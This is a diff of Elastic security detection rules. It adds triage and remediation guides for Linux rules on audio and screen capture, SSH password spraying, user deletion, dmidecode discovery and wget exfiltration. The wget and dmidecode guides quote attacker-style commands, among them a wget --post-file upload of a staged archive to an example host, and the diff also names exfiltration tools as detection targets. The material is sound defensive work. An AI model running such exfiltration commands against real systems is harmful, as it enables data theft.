- A legitimate systemd or cron job starts arecord/parec/pw-record/pw-cat -r to periodically sample audio for device diagnostics or content creation, resulting in an uncommon parent process yet expected outputs under user or application directories.
### Response and remediation
- Immediately terminate arecord, parec, pw-record, ecasound, pw-cat -r, or ffmpeg processes launched by cron/systemd/ssh and stop any associated systemd units/timers, then block outbound RTMP/HTTP/SFTP connections from the recording user.
- Disable and remove persistence that invokes recording, including systemd .service/.timer files under /etc/systemd/system or ~/.config/systemd/user, cron entries in /etc/cron.* or user crontabs, and autostart scripts in ~/.config/autostart or /etc/xdg/autostart, and quarantine any unknown executables or wrappers in /tmp, /var/tmp, or hidden user directories that spawn these tools.
- Before cleanup, preserve the full command line and copies of recorded artifacts (WAV/MP3/OGG) located in ~/.cache, ~/.local/share, /tmp, /var/tmp, and hidden directories, then remove remaining audio files and staging folders after evidence collection.
- Verify recovery by confirming no active record nodes in PipeWire/PulseAudio and no further opens on /dev/snd/*, and restart affected user sessions or hosts if audio subsystem settings were altered.
- Harden by restricting access to /dev/snd/* via udev group membership and AppArmor/SELinux, whitelisting approved desktop apps, and adding detections to flag non-interactive parents launching arecord/ffmpeg or pw-cat -r and creation of large audio files in cache/temp paths.
- Escalate to incident response and privacy/legal if recording is initiated by a root-owned systemd service or an unknown binary in /tmp, or if audio streaming/exfiltration to external IPs/domains is observed.
"""
risk_score = 21
rule_id = "3ee526ce-1f26-45dd-9358-c23100d1121f"
severity = "low"
@@ -30,6 +61,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -20,6 +20,37 @@ index = [
language = "kuery"
license = "Elastic License v2"
name = "Linux Video Recording or Screenshot Activity Detected"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux Video Recording or Screenshot Activity Detected
This alert flags the launch of common Linux screenshot or screen-recording tools—such as scrot, gnome-screenshot, flameshot, grim, or obs—when triggered by an atypical parent process, indicating potential visual data collection. A typical attacker pattern is a compromised user session or remote shell spawning scrot or grim during credential entry to capture MFA codes and application windows, or starting simplescreenrecorder/obs to persistently record the desktop for later exfiltration.
### Possible investigation steps
- Review the process lineage and session context to determine if the capture was launched interactively from a desktop or via ssh/cron/systemd or a script in transient directories.
- Inspect command-line options and environment variables (DISPLAY, WAYLAND_DISPLAY, XAUTHORITY) to identify window/region capture, explicit save targets, or headless clipboard-only usage.
- Search for newly created media files around the alert time (screenshots under ~/Pictures or /tmp, and recordings like .mkv/.webm) and evaluate their sensitivity and relevance.
- Verify binary provenance and integrity by checking installation logs, file path and ownership, hashes, and unexpected copies or modified ELF binaries in user-writable locations.
- Correlate with user and network telemetry for concurrent credential entry, browser MFA prompts, or outbound transfers/clipboard synchronization indicative of exfiltration.
### False positive analysis
- A user presses Print Screen or uses a desktop hotkey, and the environment launches gnome-screenshot, flameshot, or grim via a keybinding/compositor component, producing an uncommon parent despite benign activity.
- Legitimate demo or documentation recording with obs or simplescreenrecorder started by a wrapper script, cron, or a systemd unit can surface as a non-interactive start from an unusual parent without malicious intent.
### Response and remediation
- Immediately terminate the capture process (e.g., scrot, grim, flameshot, gnome-screenshot, simplescreenrecorder, obs) and isolate the host or terminate the GUI session, suspending the user and revoking SSH keys if the parent was sshd, cron, or a systemd unit.
- Eradicate launch points by deleting rogue systemd services/timers, crontab entries, ~/.config/autostart/*.desktop files, and scripts in /tmp or ~/bin that invoke these tools, and replace any trojanized binaries found outside package-managed paths.
- Recover by rotating passwords and invalidating MFA sessions/tokens used during the recorded period, then remove captured media (.png/.jpg/.webm/.mkv) from ~/Pictures, /tmp, and similar staging paths after evidence collection.
- Escalate to incident response and privacy/legal if screenshots/recordings contain credentials, customer data, or secrets, if execution originated from privileged users or servers, or if exfiltration is observed via scp/rsync/curl to external hosts.
- Harden endpoints by uninstalling unneeded screenshot/recording packages, enforcing allowlists and AppArmor/SELinux profiles that block scrot/grim/obs except for approved users, and requiring xdg-desktop-portal/PipeWire screencast prompts for console users only.
- Improve detection by alerting on these binaries executed by sshd/cron/systemd, repeated saves under ~/Pictures or /tmp, copies in user-writable paths (~/bin, /tmp), and outbound transfers of resulting media files.
"""
risk_score = 21
rule_id = "93dd73f9-3e59-45be-b023-c681273baf81"
severity = "low"
@@ -31,6 +62,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -2,7 +2,7 @@
creation_date = "2025/12/24"
integration = ["system"]
maturity = "production"
updated_date = "2025/12/24"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -17,6 +17,36 @@ from = "now-9m"
language = "esql"
license = "Elastic License v2"
name = "Potential Password Spraying Attack via SSH"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Potential Password Spraying Attack via SSH
This rule flags bursts of failed SSH logins coming from the same network origin against many different Linux accounts within a short window, indicating password spraying that can precede account compromise. It matters because attackers try a small set of common passwords across broad user lists to evade lockouts and find one weak credential. A typical pattern is an external VPS rapidly trying passwords like “Welcome123” or “Spring2024!” against 30+ usernames (e.g., admin, test, ubuntu, devops) over five minutes via SSH on a single server.
### Possible investigation steps
- Check for any successful SSH authentications from the same source IP within a short window around the failures and, if found, pivot to session details such as interactive TTY use, sudo activity, and modifications like authorized_keys updates.
- Enrich the source IP with geolocation, ASN, reputation, and cloud-provider attribution and verify whether it is observed attempting SSH across multiple hosts to confirm a broad spray pattern.
- Compare the attempted usernames against your directory to identify valid and privileged or service accounts and confirm whether lockouts, password resets, or MFA challenges were triggered.
- Determine if the affected host is internet-exposed and which port SSH is reachable on, then review current SSH authentication settings (password vs key-based, PAM/MFA) to assess risk of compromise.
- Correlate the source IP with approved scanners, bastion hosts, or change tickets and maintenance windows to quickly rule out sanctioned testing or misconfigured monitoring.
### False positive analysis
- A misconfigured internal automation or admin script on a management or jump host sequentially attempts SSH to many accounts with an outdated password, producing more than 10 distinct usernames and at least 30 failures from a single source IP within five minutes.
- Legitimate users behind a shared NAT or bastion host concurrently attempt SSH with expired credentials during a password rotation or temporary authentication issue, making failures across many distinct usernames appear to come from one IP.
### Response and remediation
- Immediately block the spraying source IP(s) at host firewalls (iptables/nftables) and edge controls, and temporarily restrict SSH (port 22) to approved bastion/jump host CIDRs only.
- If any login succeeded or an sshd session from the same IP is active, terminate it, remove any newly added ~/.ssh/authorized_keys entries, and force password resets with MFA for the targeted users.
- Before restoring normal access, verify no persistence by checking for changes to /etc/ssh/sshd_config, sudoers, or cron jobs and reviewing /var/log/auth.log and lastlog for anomalies, then re-enable only required accounts.
- Escalate to incident response if privileged or service accounts were targeted, the spray spanned multiple servers, or there is evidence of sudo activity, file changes under /root or /etc, or a successful login, and preserve auth logs, bash histories, and firewall block artifacts.
- Harden SSH by disabling PasswordAuthentication, enforcing key-based auth with PAM MFA, setting conservative MaxAuthTries and LoginGraceTime, enabling fail2ban or equivalent bans, and restricting access via AllowUsers/AllowGroups and security group rules.
"""
risk_score = 21
rule_id = "9e81b1fd-e9fb-49a7-8ebe-0d1a14090142"
severity = "low"
@@ -25,6 +55,7 @@ tags = [
"OS: Linux",
"Use Case: Threat Detection",
"Tactic: Credential Access",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/08"
integration = ["system"]
maturity = "production"
updated_date = "2026/01/08"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["filebeat-*", "logs-system.auth-*"]
language = "eql"
license = "Elastic License v2"
name = "Linux User or Group Deletion"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux User or Group Deletion
This rule surfaces successful deletions of Linux users or groups—activity that can erase evidence, hide persistence, or disrupt access control. A common pattern is an attacker with root rights running userdel -r to remove a temporary privileged account they used for access, deleting its home directory and mail spool to strip artifacts. Correlate with recent privilege escalation and changes to sudoers/wheel to identify whether this was malicious cleanup versus routine deprovisioning.
### Possible investigation steps
- Correlate with auth and sudo logs to identify the actor, session (TTY/SSH), and source IP that executed the deletion and confirm whether root was obtained via sudo or another escalation path.
- Inspect the process tree and command line to see if userdel/groupdel used -r to remove the home/mail spool and whether it was launched from an interactive shell, SSH session, or automation tooling.
- Validate expected deprovisioning by checking HR/ticketing/IdM and configuration-management activity around the time, and escalate if the deleted identity was privileged or part of sudo/wheel.
- Build a timeline around the event to find adjacent actions such as account creation, password or key changes, group membership edits, and modifications to /etc/passwd, /etc/group, /etc/shadow, or sudoers.
- Assess impact and persistence by locating services, cron/systemd units, files, ACLs, or running processes still referencing the deleted UID/GID, attempt recovery of the home/mail from backups, and look for wtmp/btmp/lastlog tampering.
### False positive analysis
- Scheduled deprovisioning or baseline enforcement where administrators intentionally remove stale local users or groups associated with retired projects, decommissioned systems, or role changes during maintenance.
- Package uninstall or system maintenance scripts that add a service account during setup and later remove it during cleanup, causing legitimate user/group deletion events.
### Response and remediation
- If the deletion is unauthorized, immediately isolate the host and restrict interactive access by setting PermitRootLogin no and tightening AllowUsers/AllowGroups in /etc/ssh/sshd_config, then systemctl restart sshd to apply.
- Review and clean authorization and persistence by inspecting /etc/sudoers and /etc/sudoers.d for unauthorized rules, checking wheel/sudo memberships in /etc/group, and purging cron or systemd units that reference the deleted UID/GID.
- Recover the identity if legitimate by recreating the user/group with the original UID/GID from /var/backups/{passwd,group,shadow}, restoring the corresponding /home directory and /var/spool/mail from backups, and reassigning orphaned files using find -nouser -nogroup to a valid account.
- Rotate credentials associated with the deleted identity by replacing SSH keys and secrets found in ~/.ssh/authorized_keys and application configs, and invalidate cached tokens and service account credentials that may have been shared.
- Escalate to incident response if the deleted account was privileged (present in wheel/sudo groups), userdel/groupdel used -r to remove the home/mail spool, or evidence of log tampering exists such as truncated /var/log/auth.log or altered wtmp/btmp/lastlog.
- Harden by centralizing local account lifecycle in IdM/LDAP, enforcing visudo-managed sudo changes, enabling auditd watches on /usr/sbin/userdel,/usr/sbin/groupdel and writes to /etc/passwd,/etc/group,/etc/shadow, and deploying AIDE to monitor integrity of /etc.
"""
risk_score = 21
rule_id = "8f8004e1-0783-485f-a3da-aca4362f74a7"
setup = """## Setup
@@ -43,6 +74,7 @@ tags = [
"OS: Linux",
"Use Case: Threat Detection",
"Tactic: Defense Evasion",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -20,6 +20,37 @@ index = [
language = "eql"
license = "Elastic License v2"
name = "System Information Discovery via dmidecode from Parent Shell"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating System Information Discovery via dmidecode from Parent Shell
This rule flags dmidecode launched from a parent shell, signaling collection of hardware and firmware inventory that adversaries use to profile a host and inform exploitation or lateral movement. A typical pattern is an intruder running bash -c 'dmidecode -t system -t bios' within a post-exploitation script to harvest model, serial, BIOS vendor, and hypervisor indicators, then tailoring payload choices or host-based evasion accordingly.
### Possible investigation steps
- Extract the full parent shell command payload to see exact dmidecode arguments, targeted DMI types, and any output redirection or piping to grep, gzip, curl, scp, or similar utilities indicating data collection or exfiltration.
- Correlate execution context by tying the parent shell to the user, TTY versus non-interactive origin (cron/systemd/SSH), source IP, and presence of unexpected sudo/root elevation to judge intent and privilege.
- Pivot on the parent PID and session to list adjacent commands within the timeline to identify broader discovery or staging chains and any script or binary loader used.
- Search for captured output by reviewing recent file writes under /tmp, /var/tmp, /dev/shm, and home directories for DMI dumps, hardware inventory files, or compressed archives, and triage ownership and timestamps.
- Investigate network activity from the shell and its children around the event for outbound connections, especially HTTP/S3/SSH transfers that could carry dmidecode output, and capture destination details for enrichment.
### False positive analysis
- A system administrator runs a shell with -c to execute dmidecode during manual troubleshooting; corroborate with an interactive TTY, a known admin user, and absence of adjacent collection or network activity.
- A legitimate cron or systemd maintenance/provisioning job calls a shell with -c to run dmidecode for hardware inventory; verify the scheduled unit or service, script location under /etc, and expected run cadence.
### Response and remediation
- Immediately kill the shell process running '-c "dmidecode ..."', terminate its children (e.g., grep, gzip, curl, scp), and isolate the host if the command chained output to a network transfer.
- Block observed exfil destinations by adding temporary egress rules for the IP/domain referenced in the parent shell (curl/wget/scp targets), and confiscate any DMI dumps or archives found under /tmp, /var/tmp, or /dev/shm.
- Remove persistence by deleting scripts and jobs that call dmidecode, including entries under /etc/cron.*, systemd units in /etc/systemd/system, or shell scripts dropped in home directories and /opt, and clear residual output files.
- Recover by validating integrity of /usr/sbin/dmidecode and shell binaries (bash/sh/zsh), restoring from backup if tampering is detected, and re-enable network only after rotating passwords and SSH keys for affected accounts.
- Escalate to incident response if dmidecode output is compressed/encoded then sent externally (e.g., '/tmp/dmi.txt.gz' piped to curl or scp), if run via sudo by an unexpected user, or observed on multiple hosts in a short window.
- Harden by restricting dmidecode use to approved scripts via sudoers and AppArmor/SELinux profiles, alerting on shell '-c' hardware inventory commands, auditing writes to /tmp and /var/tmp, and replacing ad-hoc inventory with signed, centrally managed tooling.
"""
references = ["https://research.checkpoint.com/2024/29676/"]
risk_score = 21
rule_id = "da0ebebe-5ad3-4277-95e7-889f5a69b959"
@@ -69,6 +100,7 @@ tags = [
"Data Source: Elastic Endgame",
"Data Source: Elastic Defend",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -23,6 +23,37 @@ index = [
language = "eql"
license = "Elastic License v2"
name = "Potential Data Exfiltration Through Wget"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Potential Data Exfiltration Through Wget
This rule flags Linux processes that launch wget with options that upload a local file via HTTP POST, a behavior used to exfiltrate staged data to an external server. Attackers gather files, compress them in /tmp, then execute wget --post-file=/tmp/loot.tar.gz https://example.com/upload from a non-interactive shell or cron job to covertly push the archive out over standard web traffic.
### Possible investigation steps
- Pull the full command line to extract the posted file path, verify the file still exists, capture size/timestamps, and hash its contents to gauge sensitivity and origin.
- Review the process tree and session context (parent, user, TTY, cron/systemd/container) and correlate with recent logins or scheduler entries to determine whether this was automated or a remote shell action.
- Enrich the destination endpoint with DNS, WHOIS, certificate, proxy, and egress firewall logs, and check for prior communications from this host to the same domain/IP to assess legitimacy.
- Pivot 30–60 minutes prior on the host/user for staging activity such as tar/gzip in /tmp, bulk file collection, or discovery commands, and interrogate shell history and filesystem events tied to the posted file.
- If the file was removed post-upload, attempt recovery from EDR or backups and estimate exfil volume and content types via proxy or egress gateway logs to determine impact and drive containment.
### False positive analysis
- A maintenance or monitoring script run via cron posts log archives or configuration snapshots using wget --post-file to an internal HTTP endpoint for routine diagnostics.
- An administrator or developer testing a web form or API uses wget --body-file to POST a sample file during troubleshooting, producing a benign one-off event.
### Response and remediation
- Immediately isolate the host, terminate the offending wget process, block outbound HTTP(S) to the destination domain/IP seen in the command wget --post-file=/path/to/file https://example.com/upload, and quarantine the posted file path and its parent directory.
- Identify and disable any cron, systemd, or shell script that invoked wget with --post-file or --body-file (e.g., entries in /etc/cron.d/, user crontabs, or /home/user/.local/bin/upload.sh), delete the script, and revoke the invoking account's API tokens and SSH keys.
- Remove staged archives and temp files referenced in the upload (e.g., /tmp/loot.tar.gz and /var/tmp/*.gz), delete companion tooling or collection scripts found alongside them, and reimage the host if system integrity cannot be assured.
- If the posted content includes credentials, source code, or customer data, rotate affected passwords/keys, invalidate tokens, notify data owners, and restore impacted systems or files from known-good backups.
- Escalate to incident response and initiate wider containment if the destination domain/IP is not owned by the organization or resolves to an anonymizing/VPS service, if multiple hosts exhibit wget --post-file from non-interactive sessions, or if the uploader executed as root.
- Harden by enforcing SELinux/AppArmor policies that restrict wget/curl from posting files, requiring egress web proxy allowlists for HTTP POST destinations, adding detections for wget --post-file/--body-file and curl --upload-file/-F, and removing wget from systems where it is unnecessary.
"""
references = ["https://gtfobins.github.io/gtfobins/wget/"]
risk_score = 47
rule_id = "8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6"
@@ -62,6 +93,7 @@ tags = [
"Data Source: Crowdstrike",
"Data Source: SentinelOne",
"Data Source: Elastic Endgame",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,9 +2,9 @@
creation_date = "2025/01/31"
integration = ["endpoint"]
maturity = "production"
updated_date = "2025/04/23"
min_stack_version = "9.0.0"
min_stack_comments = "The fields file.origin_referrer_url and file.origin_url were introduced in ECS as of version 9.0.0"
updated_date = "2026/01/12"
min_stack_version = "9.1.0"
min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases."
[rule]
author = ["Elastic"]